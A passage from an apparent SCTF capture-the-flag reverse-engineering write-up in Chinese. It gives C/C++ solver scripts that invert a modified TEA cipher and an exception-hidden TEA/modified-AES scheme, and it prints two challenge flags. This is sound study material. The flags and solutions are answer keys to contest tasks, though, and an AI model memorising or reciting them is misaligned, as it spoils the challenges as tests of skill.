FC\xB3\x76\x73\x76\x65\xF9\xDD\xC4\xF0\x55\xEE\xA3\xCE\x5C\xDA\xA1\xE7\x1F\xC2\xA4\x38\x2C\xE7\xE2\xDD\xA3\x96\x55\x79\xBF\xE4\x12\x2A\x4D\x55\xD1\xEE\x13\xF2\x1B\x17\x99\x0B\x4B\x6F\xC0\x2E\x92\x24\xBC\xAA\x38\x6E\x5A\x72\x44\x12\x54\x08\x04\xFD\xD3\xAC\x3F\x58\x48\xC4\x40\xB8\x9C\x51\xA7\x5A\xBB\x48\xAA\xA2\x4E\xC6\xEB\xB3\x50\x44\xA3\xD7\x10\x7A\x82\x9F\x57\xA2\x35\x68\x0E\x32\x14\xC7\x9B\x7D\x5D\x23\x15\x4D\x65\xD8\xFD\xDE\x41\x9B\xDE\x08\x86\xC1\x8D\xD0\x91\x8E\x16\xE3\xA0\x95\xBF\x6E\x82\x0A\x65\x28\x64\x0C\x74\xA6\xCC\x50\x84\xD9\x31\x08\x11\x53\x2C\xFB\xDC\x32\x8D\x46\x61\x25\x93\xAD\x46\xAD\x14\x24\x61\x9F\x5D\x77\xAC\x25\x1F\xDA\xAD\x22\x5A\xB3\xFA\xD7\xDB\x39\xA2\x8B\x3E\x51\x7B\x9F\xCC\x68\xC0\xC9\x8C\x92\xE9\xE1\xA9\xFC\x28\x59\xE4\x36\xC4\xD1\xCE\xCD\x5B\xF7\xAA\xC3\xAC\x05\xEB\x8B\xD4\x1E\x13\x52\xB7\x51\xFA\xD2\x26\xF8\xFB\x7D\xF5\x22\x8F\x21\x23\x9A\xB3\x2B\x5B\x7F\xD8\xBD\xD6\x22\xF4\xF6\x44\xEC\xC0\xB6\x9B\x0E\x48\xD9\x4C\x29\x71\x4A\xE0\xDD\x77\xCA\x93\x5E\x6A\x0B\xB8\xE9\xAA\xBA\xC1\x6D\xA1\x01\x8E\x87\x7E\xAB\x08\xD5\xC2\x72\xFB\x4C\xAF\x40\x45\x09\xA7\x91\xEA\x83\xE2\xCB\xDC\xF3\xCA\xC3\x65\x34\x61\x78\x3B\x81\x0B\x8D\xCD\xF2\x7A\x79\xB2\x04\x74\xAD\x35\x1F\xD0\xAA\x81\x6F\x3D\xE0\x5C\x1E\xBC\xD5\x84\x22\x0E\x27\x25\x05\x01\xD9\xF5\x74\xC2\xE6\xC6\xA1\x13\x72\xFF\x14\x51\xDE\xBE\x1D\xBA\xD2\x28\x94\xD4\xB1\x59\xB3\x3C\x38\x13\xD6\x9E\xFA\x60\x9C\x10\x8F\x33\x39\x91\x04\x6D\x92\x91\x14\x56\xBA\x60\xAF\xD7\xA2\x5A\x75\x94\x83\x2C\x51\x4A\xB5\x0A\xD9\x81\x34\x2A\x45\xCC\x79\xC8\x20\x7C\x7E\x4F\x3B\xEA\xE4\x5E\x38\x53\x4D\x26\x91\x32\xE6\xE2\xDA\x56\x07\x31\x3C\x48\x9E\xD4\xA0\xFF\xBB\xFB\x32\x03\x71\xC4\xD1\xDF\xC8\x89\xDF\x19\xC9\x9E\x92\x0F\x75\x6E\x64\x6E\xB7\x93\x1D\x42\x6C\x4B\xEA\x59\xFE\xD0\x42\xEE\x88\x69\x3B\x31\x36\xE5\xA1\xAA\x63\x15\x2C\xA0\x46\x35\x85\xEB\xC0\x87\xA9\x11\x66\x25\x39\x71\x95\x19\x2E\x7B\xA0\x38\x24\xA0\x25\x6B\x5E\xCC\x16\x97\x59\x9D\x5D\x7E\x45\x24\xAA\x57\xC7\xD3\x86\x02\xE7\xE8\xCC\x7B\x6D\x03\xB0\x65\x51\xE5\xA9\x86\x6A\x57\xE7\x6E\x8E\x1B\x3C\x56\xDE\x20\x1B\xFE\xF1\xD6\x3A\x00\x09\x4A\x66\xF0\xCC\xC3\x4A\x5B\x80\x10\x58\xF6\xB8\x66\x8F\x6B\x63\x19\x8B\xC3\xF5\x3C\xF4\x4B\xD5\x38\xB6\xE0\x3F\x7D\x7F\x66\xEF\x2E\xCE\xBE\x4F\xD5\xAD\x82\x18\x2F\x43\x91\x7C\xEF\x65\x79\xBD\xDF\xA3\x18\x4A\x96\x0C\x69\xF2\x19\x82\x12\x13\x40\x2A\x9C\x53\xCA\x68\xEE\x8D\x42\x28\x6A\xF9\xB8\x7B\x31\xCB\x6F\xE2\xA2\x04\x4C\x59\x5D\x32\xF2\xC0\xD8\x85\xEF\x1C\x9F\x76\xCA\xA0\x79\xAE\x1F\x67\x95\x4D\x62\xFC\x60\xBB\x37\xDB\x37\xE8\x29\xF5\x0B\xE5\x45\x5D\x38\xAC\xCD\x3A\xB8\xA2\xA1\xE4\xB7\x0E\x45\x16\x6F\xD1\x97\x4E\xAA\xC7\xBF\xCC\x49\x4E\x84\x77\x52\xA6\xD9\xEB\x1C\x14\x8A\x08\xB9\x6E\xEA\x0E\x69\xB5\x50\xD9\xAA\x32\xD5\x4D\x70\x92\x14\xE9\x2F\x55\x4A\xAC\x56\x9D\xD8\x02\xB5\xE5\x83\x11\x98\xA8\x5F\x80\x21\x53\x2D\xDD\x11\x11\x5C\xE3\xCA\xA5\x07\x19\x11\x11\x3A\xC7\xD2\xA3\xE3\x4D\xBB\xF3\x6D\xB4\xF2\x1C\xDE\xA5\x18\x8D\x17\x99\x91\xD8\xE3\xEC\x8E\x71\x9F\x9D\x10\xFD\xCF\xC5\x8E\xBC\x19\x52\x89\xE5\x3A\xF5\x0F\x45\xB4\x78\x4B\xC1\xFA\x16\xF3\xC2\xDF\x14\x2C\xD1\x5C\xA0\xFE\xCF\x78\x49\x60\xFB\xB3\x71\x1E\x75\xE9\x30\xC9\x97\xCC\x32\x1C\x11\x2D\x4C\x19\x26\x54\xA4\x65\xB7\x86\xE2\xC0\xE7\x46\xC1\x8B\xED\x27\x38\x32\x20\x84\x47\x4E\x2B\x1D\xA6\xB6\xEE\x09\x3D\xEF\xB4\xB7\x4E\x42\x37\xCD\x26\xE5\xB8\x8B\xE9\xEE\x4C\xAF\x28\xEF\xEF\xCA\xA3\x0A\x23\xF7\x45\x82\x2B\x50\x4D\x2D\xB3\x94\xBB\xD6\x82\xE9\xE8\xF3\x4E\x8B\x8A\x3E\x37\xB7\x14\x54\xB8\xA2\x47\x0D\x26\x17\xA4\x73\xCF\xD9\x40\x00\x6D\x43\x48\x24\xBF\x4D\xAF\x9D\x47\x97\x9F\x92\x48\x0D\x8F\x51\xAC\x42\x03\xB1\xDB\x9D\x68\x67\x3E\x45\xD8\x1E\x17\x89\xCF\xE8\x5E\xA4\x0D\x82\xB2\xED\x50\x06\x0C\xA0\xE4\xE7\x91\x1C\xE3\xD0\xCE\xAA\x47\x18\xD4\xA8\x68\x5D\x98\x46\xAC\x0F\xA8\x93\x3B\x1F\x06\xE4\x3F\xA9\xA4\xB0\x9C\xD4\x94\x02\x81\xD5\xC0\x40\xB4\xEF\xFA\x16\x64\xCD\x46\xF9\x6C\x25\x82\x9B\x83\x94\x73\x18\x32\x66\xA1\x0F\x7F\x99\x4E\x2F\x2E\x5A\x74\x68\xD8\x4D\x65\xDF\xA8\x8D\x6F\x67\xB7\x64\x9D\xB0\x2E\xFD\xA8\x90\xD6\x56\xC1\xD3\xD1\x35\x7E\x46\x38\x8F\x9C\xFD\xCF\xD6\x25\x7F\x01\xB0\xE9\x3C\x2A\xB9\x6A\x81\x08\xC5\xDE\x2E\xD1\x1E\x40\x93\xB9\x72\xE1\xC5\x7F\x4F\x47\x65\xA2\x87\x8E\xF3\x5F\x63\xA5\x60\x6F\x2C\xC1\x69\xA0\xB8\xAF\x4B\x32\x93\x81\x6F\x22\x24\x00\x3A\x60\xA6\x90\xDA\x71\x37\x3F\xC2\x14\xEF\x2A\x75\xF4\xD9\xB6\x5F\xCC\xDB\xBD\x44\x5E\x22\x56\x21\xE9\x32\x23\x0D\x62\x80\xDF\xA2\xAA\xEB\x77\xF6\x5D\xD6\x0E\x0A\xE0\xFD\xA9\xC1\x34\x8D\x49\xD1\x47\x1A\xC8\xEE\xCA\x11\xF5\xB5\x4C\xDF\x2B\x58\x7D\xAB\xCB\x17\x22\x05\x75\x28\xE8\xB6\x1F\x3F\x09\x1B\xD2\x20\x03\xB4\x0F\x51\x6F\x59\xBC\xF8\x47\xC1\x5D\xC8\x05\x86\xB8\x25\x1A\xEA\xA2\x09\x62\x0B\xB1\xDF\x8C\x2B\x81\xBD\x65\x7E\x14\x13\x16\xE2\xF6\x65\xA4\xC2\x93\x2C\xF8\x20\xE9\x48\x09\x74\xAC\x0A\x37\x09\xF0\xB0\xA1\x8A\x3E\x1E\x54\x02\x36\x4B\x70\x0C\xDC\x71\xAC\x7A\x7A\x76\xE7\xD8\x81\x7B\x55\x3E\xBC\xCA\x7F\xD0\xEC\x06\xD4\x4B\x99\xFB\xC3\x87\x83\x8D\x24\xF6\x3A\x65\x76\x58\x57\x0F\x88\xB2\x7F\xB4\xFD\xD0\x06\x93\xDA\x98\x67\x3C\x7B\xE7\x49\x02\x1D\x10\x5F\xFE\xE8\xD3\xCF\xAC\xF4\xB6\x57\xC5\x10\x3D\x1D\x7D\xF1\x5F\x83\x9C\x5C\x7D\x26\x81\x56\x36\xF2\xB6\x87\xB8\x48\x92\xA3\x8C\xA1\x66\x8A\x22\xBD\x14\x83\xB5\x9C\x99\xEE\xD3\xE7\xCA\xDE\x8F\x89\xAA\xE2\xFB\x51\x24\x81\x42\x2D\x1D\xC0\xC2\x9B\xFA\xD1\x89\x73\xDD\x0C\x18\xBC\xA9\xAC\x2C\x1F\x7E\x57\x86\x98\x99\xC9\x2C\x10\x82\x49\x4B\x61\x9C\x33\x17\xA2\x72\xDC\x5E\x72\x7B\x0B\xB7\x2D\x78\x19\x96\xCD\xB1\xA8\xE5\xA2\x0D\x09\xA4\x82\x3D\xAD\xC3\x58\x38\x0A\x49\x5F\x42\x4E\xF8\xFF\x6D\x23\x09\x52\xA3\x41\x51\x65\xDC\x1C\x10\x96\x31\xAF\x46\xB3\x90\x5C\x62\xC0\xB4\xF9\x05\x18\x31\x86\xC4\xA3\xAA\xF1\xE7\x16\xDC\xAA\xA9\x4C\xE5\x6D\x2C\xFF\xCE\xBB\x9A\xE8\x55\x51\x9B\xF7\x11\x52\x4B\x57\x51\x75\x2A\xF9\xDE\x67\xFC\x37\x8C\xF1\xBC\xD0\x33\xDC\x39\x2D\x0C\x03\x90\xB8\xEE\x68\x5E\x2C\x29\xB8\x8A\xBE\xC3\x80\x34\xCF\xE1\x7A\xB7\x73\x13\xE4\x0D\xCF\xAD\x6D\xA2\x7C\x16\xA5\x5D\xAB\xBE\x8E\xCD\xB0\x80\x04\x64\xB1\x73\x81\x46\x80\x00\xC4\xA9\x88\x5C\x9F\x77\x8F\x8E\x18\x26\x1F\xC5\x4F\xA0\x7C\xAD\x7E\xD5\x1F\x1B\xC5\xEF\x97\x4A\xAE\xDD\x55\xD8\xCF\x86\xE4\xAE\x78\x37\xE2\xFE\xA4\x89\x43\x38\x1C\xF0\x43\x62\x2B\xAC\x3E\xA0\x98\xE6\x85\xC3\xAF\xF8\xD4\x95\xA5\xFC\x9A\x8E\xEA\x98\xC8\x23\xCE\x13\x47\x78\xD1\x84\x96\xC8\xA0\xBC\x4C\x89\xF8\x08\x96\x14\xCA\x79\x0E\x04\x6F\x77\x8F\x5D\x21\x50\x15\x58"; void re_tea_buf2(unsigned int *data) { unsigned int sum = 0; unsigned int v0 = data[0]; unsigned int v1 = data[1]; unsigned int k0 = 0x11222233; unsigned int k1 = 0xAABBCCDD; unsigned int k2 = 0x1A2B3C4D; unsigned int k3 = 0xCC1122AA; unsigned int sums[16]; unsigned int sums_idx = 0; do { sum -= 0x61c88647; sums[sums_idx++] = sum; } while (sum != -0x1c886470); for (int i = 15; i >= 0; i--) { sum = sums[i]; //v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3); //v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1); v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3); v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1); } data[0] = v0; data[1] = v1; } void re_tea_buf1(unsigned int* data) { unsigned int v0 = data[0]; unsigned int v1 = data[1]; unsigned int k0 = 0x11222233; unsigned int k1 = 0xAABBCCDD; unsigned int k2 = 0x1A2B3C4D; unsigned int k3 = 0xCC1122AA; unsigned int sumlist[8] = { 0 }; int idx = 0; unsigned int sum = 0; do { sumlist[idx] = sum; sum = sum + -0x61c88647; idx++; } while (sum != -0xe443238); for (int i = 7; i >= 0; i--) { sum = sumlist[i]; v0 += (v1 + sum ^ v1 * 0x10 + k0 ^ (v1 >> 5) + k1); v1 += (v0 * 0x10 + k2 ^ (v0 >> 5) + k3 ^ v0 + sum); } data[0] = v0; data[1] = v1; } void re_buf2() { for (int i = 0; i < 0x200; i++) { re_tea_buf2((unsigned int*)(dst2 + i * 8)); } } void re_buf1() { for (int i = 0; i < 0x200; i++) { re_tea_buf1((unsigned int*)(dst1 + i * 8)); } } void swap_dst() { unsigned char tmp[0x1000]; memcpy(tmp, dst1, 0x1000); memcpy(dst1, dst2, 0x1000); memcpy(dst2, tmp, 0x1000); } void swap_data(int i){ unsigned char tmp[0x100]; int rev_i = 15 - i; memcpy(tmp, dst1 + rev_i * 0x100, 0x100); memcpy(dst1 + rev_i * 0x100, dst2 + i * 0x100, 0x100); memcpy(dst2 + i * 0x100, tmp, 0x100); } struct blockb { unsigned char data[0x80]; }; int main() { // return 0; for (int i = 15; i >= 0; i--) { swap_dst(); swap_data(i); re_buf1(); re_buf2(); } //printf("%x\n", dst1[0]); unsigned char flag[0x41] = { 0 }; unsigned int idx = 0; for (int i = 0; i < 0x20; i++) { blockb box[256] = { 0 }; for (ULONG64 i_1 = 0; i_1 < 256; i_1++) { ULONG64 pchar = i_1 + i; for (int j = 0; j < 0x80; j++) { pchar = (ULONG64)pchar * (ULONG64)0x41c64e6d + (ULONG64)0x3039; ULONG64 b = (pchar << 0x21) >> 0x31; box[i_1].data[j] = (unsigned char)b; } } for (int i_2 = 0; i_2 < 256; i_2++) { //if (dst2[0] == box[i].data[0]) { //printf("%x\n", i); //} if (!memcmp(dst2 + i * 0x80, box[i_2].data, 0x80)) { printf("%x\n", i_2); flag[idx++] = i_2; } } } for (int i = 0; i < 0x20; i++) { blockb box[256] = { 0 }; for (ULONG64 i_1 = 0; i_1 < 256; i_1++) { ULONG64 pchar = i_1 + i; for (int j = 0; j < 0x80; j++) { pchar = (ULONG64)pchar * (ULONG64)0x41c64e6d + (ULONG64)0x3039; ULONG64 b = (pchar << 0x21) >> 0x31; box[i_1].data[j] = (unsigned char)b; } } for (int i_2 = 0; i_2 < 256; i_2++) { //if (dst2[0] == box[i].data[0]) { //printf("%x\n", i); //} if (!memcmp(dst1 + i * 0x80, box[i_2].data, 0x80)) { printf("%x\n", i_2); flag[idx++] = i_2; } } } flag[0x40] = 0; printf("%s\n", flag); std::cout << "Hello World!\n"; } ``` Flag: `SCTF{xv6_nice_lab_6666_YOU_ARE_6666666_OrzzzzzzzzzzzzzrO_wowowo}` ### CplusExceptionEncrypt: 需要先下载mingw库才能运行这个exe 通过c++异常机制来实现加解密 实现了一个tea和魔改版的aes tea算法的catch位置在402C3C aes算法的catch位置在40209C x64dbg调试着逆就行 aes的行位移算法被修改过,逆运算直接复制粘贴ida里的就行 这种地方的rand是伪随机,模拟一遍就能爬出来  解密脚本: ```cpp #include <iostream> unsigned char roundkeys[] = { 0x57, 0x65, 0x6C, 0x63, 0x6F, 0x6D, 0x65, 0x5F, 0x74, 0x6F, 0x5F, 0x73, 0x63, 0x74, 0x66, 0x21, 0xC4, 0x56, 0x91, 0x98, 0xAB, 0x3B, 0xF4, 0xC7, 0xDF, 0x54, 0xAB, 0xB4, 0xBC, 0x20, 0xCD, 0x95, 0x71, 0xEB, 0xBB, 0xFD, 0xDA, 0xD0, 0x4F, 0x3A, 0x05, 0x84, 0xE4, 0x8E, 0xB9, 0xA4, 0x29, 0x1B, 0x3C, 0x4E, 0x14, 0xAB, 0xE6, 0x9E, 0x5B, 0x91, 0xE3, 0x1A, 0xBF, 0x1F, 0x5A, 0xBE, 0x96, 0x04, 0x9A, 0xDE, 0xE6, 0x15, 0x7C, 0x40, 0xBD, 0x84, 0x9F, 0x5A, 0x02, 0x9B, 0xC5, 0xE4, 0x94, 0x9F, 0xE3, 0xFC, 0x3D, 0xB3, 0x9F, 0xBC, 0x80, 0x37, 0x00, 0xE6, 0x82, 0xAC, 0xC5, 0x02, 0x16, 0x33, 0xB4, 0xBB, 0xFE, 0x15, 0x2B, 0x07, 0x7E, 0x22, 0x2B, 0xE1, 0xFC, 0x8E, 0xEE, 0xE3, 0xEA, 0xBD, 0xE5, 0x3C, 0x84, 0x3D, 0xCE, 0x3B, 0xFA, 0x1F, 0xE5, 0xDA, 0x06, 0x91, 0x0B, 0x39, 0xEC, 0x2C, 0x77, 0xF2, 0xF5, 0x16, 0xB9, 0xC9, 0x0F, 0x09, 0x5C, 0x13, 0x09, 0x98, 0x57, 0x2A, 0xE5, 0xB4, 0x89, 0x2B, 0x78, 0x4D, 0x30, 0xE2, 0x77, 0x44, 0x6C, 0xF1, 0x7E, 0xDC, 0x3B, 0xDB, 0x9B, 0x68, 0x06, 0x3F, 0x3D, 0xAF, 0x36, 0xDD, 0x4A, 0xEB, 0x5A, 0x2C, 0x34, 0x37, 0x61, 0xF7, 0xAF, 0x5F };; void AddRoundKeys(unsigned char* data, unsigned char* key) { for (int i = 0; i < 0x10; i++) { data[i] ^= key[i]; } } void SubBytes(unsigned char* plaintext, unsigned char* plaintextencrypt, int count)/*S盒置换*/ { unsigned int row, column; unsigned char Sbox[16][16] = { /* 0 1 2 3 4 5 6 7 8 9 a b c d e f */ /*0*/{ 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76 }, /*1*/{ 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0 }, /*2*/{ 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15 }, /*3*/{ 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75 }, /*4*/{ 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84 }, /*5*/{ 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf }, /*6*/{ 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8 }, /*7*/{ 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2 }, /*8*/{ 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73 }, /*9*/{ 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb }, /*a*/{ 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79 }, /*b*/{ 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08 }, /*c*/{ 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a }, /*d*/{ 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e }, /*e*/{ 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf }, /*f*/{ 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 } };// 填充Sbox矩阵 for (int i = 0; i < count; i++) { row = (plaintext[i] & 0xF0) >> 4; column = plaintext[i] & 0x0F; plaintextencrypt[i] = Sbox[row][column]; } } void SubBytesRe(unsigned char* plaintext, unsigned char* plaintextencrypt, int count)/*S盒逆置换*/ { unsigned int row, column; unsigned char Sbox[16][16] = { /* 0 1 2 3 4 5 6 7 8 9 a b c d e f */ {0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb}, {0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb}, {0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e}, {0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25}, {0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92}, {0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84}, {0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06}, {0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b}, {0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73}, {0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e}, {0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b}, {0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4}, {0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f}, {0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef}, {0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61}, {0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d} }; // 填充Sbox矩阵 for (int i = 0; i < count; i++) { row = (plaintext[i] & 0xF0) >> 4; column = plaintext[i] & 0x0F; plaintextencrypt[i] = Sbox[row][column]; } } void ShiftRows(unsigned char* state)/*行移位*/ { unsigned char temp = 0; temp = state[1]; state[1] = state[5]; state[5] = state[9]; state[9] = state[13]; state[13] = temp; temp = state[2]; state[2] = state[10]; state[10] = temp; temp = state[6]; state[6] = state[14]; state[14] = temp; temp = state[15]; state[15] = state[11]; state[11] = state[7]; state[7] = state[3]; state[3] = temp; } void ShiftRowsRe(unsigned char* state)/*行移位的逆*/ { unsigned char temp = 0; temp = state[13]; state[13] = state[9]; state[9] = state[5]; state[5] = state[1]; state[1] = temp; temp = state[14]; state[14] = state[6]; state[6] = temp; temp = state[10]; state[10] = state[2]; state[2] = temp; temp = state[3]; state[3] = state[7]; state[7] = state[11]; state[11] = state[15]; state[15] = temp; } static uint8_t xtime(uint8_t x) { return ((x << 1) ^ (((x >> 7) & 1) * 0x1b)); } void MixColumns(unsigned char* text) { uint8_t i; uint8_t Tmp, Tm, t; for (i = 0; i < 4; ++i) { t = text[i * 4 + 0]; Tmp = text[i * 4 + 0] ^ text[i * 4 + 1] ^ text[i * 4 + 2] ^ text[i * 4 + 3]; Tm = text[i * 4 + 0] ^ text[i * 4 + 1]; Tm = xtime(Tm); text[i * 4 + 0] ^= Tm ^ Tmp; Tm = text[i * 4 + 1] ^ text[i * 4 + 2]; Tm = xtime(Tm); text[i * 4 + 1] ^= Tm ^ Tmp; Tm = text[i * 4 + 2] ^ text[i * 4 + 3]; Tm = xtime(Tm); text[i * 4 + 2] ^= Tm ^ Tmp; Tm = text[i * 4 + 3] ^ t; Tm = xtime(Tm); text[i * 4 + 3] ^= Tm ^ Tmp; } return; } static uint8_t Multiply(uint8_t x, uint8_t y) { return (((y & 1) * x) ^ ((y >> 1 & 1) * xtime(x)) ^ ((y >> 2 & 1) * xtime(xtime(x))) ^ ((y >> 3 & 1) * xtime(xtime(xtime(x)))) ^ ((y >> 4 & 1) * xtime(xtime(xtime(xtime(x)))))); /* this last call to xtime() can be omitted */ } void MixColumnsRe(unsigned char* text) { int i; uint8_t a, b, c, d; for (i = 0; i < 4; ++i) { a = text[i * 4 + 0]; b = text[i * 4 + 1]; c = text[i * 4 + 2]; d = text[i * 4 + 3]; text[i * 4 + 0] = Multiply(a, 0x0e) ^ Multiply(b, 0x0b) ^ Multiply(c, 0x0d) ^ Multiply(d, 0x09); text[i * 4 + 1] = Multiply(a, 0x09) ^ Multiply(b, 0x0e) ^ Multiply(c, 0x0b) ^ Multiply(d, 0x0d); text[i * 4 + 2] = Multiply(a, 0x0d) ^ Multiply(b, 0x09) ^ Multiply(c, 0x0e) ^ Multiply(d, 0x0b); text[i * 4 + 3] = Multiply(a, 0x0b) ^ Multiply(b, 0x0d) ^ Multiply(c, 0x09) ^ Multiply(d, 0x0e); } return; } void dec_data(unsigned char *data) { unsigned char* proundkey = &roundkeys[16 * 10]; AddRoundKeys(data, proundkey); ShiftRowsRe(data); SubBytesRe(data, data, 16); proundkey -= 16; for (int i = 0; i < 9; i++) { AddRoundKeys(data, proundkey); if (*proundkey == 0xC4) { printf("1"); } MixColumnsRe(data); ShiftRows(data); SubBytes(data, data, 16); proundkey -= 16; } for (int i = 0; i < 16; i++) { data[i] ^= roundkeys[i]; data[i] ^= 0x66; } unsigned int& v0 = *(unsigned int*)(data); unsigned int& v1 = *(unsigned int*)(data+4); unsigned int& v2 = *(unsigned int*)(data+8); unsigned int& v3 = *(unsigned int*)(data+12); unsigned int& k0 = *(unsigned int*)(roundkeys); unsigned int& k1 = *(unsigned int*)(roundkeys + 4); unsigned int& k2 = *(unsigned int*)(roundkeys + 8); unsigned int& k3 = *(unsigned int*)(roundkeys + 12); unsigned int delta = 0x73637466; unsigned char *byte_delta = (unsigned char*)&delta; v0 ^= byte_delta[3]; v1 ^= byte_delta[2]; v2 ^= byte_delta[1]; v3 ^= byte_delta[0]; unsigned int sum1 = 0x6c6e8cc0; unsigned int sum2 = 0x6c6e8cc0; for (int i = 0x1F; i >= 0; i--) { v1 -= (sum1 + i) ^ (k1 + (v0 >> 5)) ^ (sum1 + v0) ^ (k0 + (v0 << 4)); v3 -= (sum2 + i) ^ (k1 + (v2 >> 5)) ^ (sum1 + v2) ^ (k0 + (v2 << 4)); v0 -= (sum1 + i) ^ (k3 + (v1 >> 5)) ^ (sum1 + v1) ^ (k2 + (v1 << 4)); v2 -= (sum2 + i) ^ (k3 + (v3 >> 5)) ^ (sum2 + v3) ^ (k2 + (v3 << 4)); sum1 -= delta; sum2 -= delta; } } int main() { unsigned int sum1 = 0; unsigned int sum2 = 0; unsigned int delta = 0x73637466; for (int i = 0; i < 0x20; i++) { sum1 += delta; sum2 += delta; } printf("%x\n", sum1); printf("%x\n", sum2); /*srand(0x53435446); for (int i = 0; i < 3; i++) { printf("0x%x\n", rand()); }*/ unsigned char dst[0x21] = { 0xBE, 0x1C, 0xB3, 0xF3, 0xA1, 0xF4, 0xE4, 0x63, 0x11, 0xE1, 0x1C, 0x6B, 0x54, 0x0A, 0xDF, 0x74, 0xF2, 0x93, 0x55, 0xDA, 0x48, 0xFC, 0xA2, 0x3C, 0x89, 0x63, 0x2E, 0x7F, 0x8D, 0xA4, 0x6D, 0x4E };; dec_data(dst); dec_data(dst+0x10); dst[0x20] = 0; printf("%s\n", dst); } ``` Flag: `SCTF{5277cc2af8f1155f7a61030f46fdf9df}` ### godness dance: 输入长度28位 a~z各一个 再加个i和u 正向算法 一共三个循环 a数组是比较数组 flag是输入 flag2是输出 